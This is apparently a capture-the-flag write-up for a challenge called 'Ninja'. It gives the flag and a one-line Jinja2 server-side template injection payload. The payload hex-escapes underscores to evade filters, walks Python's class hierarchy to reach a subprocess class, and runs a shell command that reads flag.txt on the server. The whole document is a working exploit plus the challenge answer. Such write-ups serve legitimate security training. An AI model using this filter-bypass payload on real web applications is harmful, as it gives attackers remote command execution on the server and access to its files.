# Ninja

###### FLAG: flag{m0mmy_s33_1m_4_r34l_n1nj4}

###### EXPLOIT:
```{{()|attr('\x5f\x5fclass\x5f\x5f')|attr('\x5f\x5f\x62\x61\x73\x65\x5f\x5f')|attr('\x5f\x5fsubclasses\x5f\x5f')()|attr('\x5f\x5fgetitem\x5f\x5f')(258)('cat flag.txt',shell=True,stdout=-1)|attr('communicate')()|attr('\x5f\x5fgetitem\x5f\x5f')(0)|attr('decode')('utf-8')}}```
